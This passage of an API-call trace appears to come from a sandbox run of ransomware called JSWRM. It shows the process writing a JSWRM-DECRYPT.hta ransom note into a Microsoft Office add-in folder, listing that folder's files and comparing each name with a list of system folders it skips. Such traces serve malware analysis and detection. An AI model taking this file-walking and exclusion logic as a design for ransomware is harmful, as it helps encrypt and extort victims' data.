0x2365d8 [0123.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0123.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0123.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0123.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ar\\jswrm-decrypt.hta")) returned 0xffffffff [0123.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0123.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0123.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0123.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0123.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0123.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0123.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0123.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0123.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ar\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0123.616] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.616] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0123.617] CloseHandle (hObject=0x314) returned 1 [0123.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0123.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0123.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0123.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0123.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0123.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0123.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0123.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0123.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0123.617] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ar\\jswrm-decrypt.hta")) returned 0x20 [0123.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0123.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0123.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0123.618] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ar\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40577766, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName=".", cAlternateFileName="")) returned 0x232140 [0123.618] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.618] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40577766, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="..", cAlternateFileName="")) returned 1 [0123.618] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.618] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.618] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd42039, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc3840, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0123.618] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0123.618] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0123.618] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0123.618] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0123.618] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0123.618] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0123.618] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0123.618] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.618] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0123.618] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0123.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0123.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0123.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0123.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0123.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0123.619] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40577766, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40577766, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40577766, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.619] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.619] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.619] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.619] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.619] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.619] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.619] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.619] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.619] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.619] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0123.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0123.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0123.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0123.619] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbda21cf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbda21cf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbda21cf, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14ac0, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.619] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0123.619] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0123.620] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0123.620] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0123.620] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0123.620] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0123.620] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0123.620] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.620] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0123.620] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0123.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0123.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0123.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0123.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0123.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0123.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.620] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x78b299, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x78b299, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x78b299, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14078, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.620] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0123.620] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0123.620] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0123.620] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0123.620] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0123.620] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0123.620] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0123.620] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.620] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0123.620] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0123.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0123.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0123.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0123.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0123.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0123.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d800, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0123.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0123.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0123.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0123.621] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc47ce76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc47ce76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc47ce76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4d10, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.621] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0123.621] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0123.621] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0123.621] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0123.621] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0123.621] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0123.621] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0123.621] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.621] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0123.621] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0123.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0123.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0123.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0123.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0123.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0123.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0123.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0123.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0123.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.622] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133cde53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50ee1, dwReserved0=0x60002, dwReserved1=0x236b86, 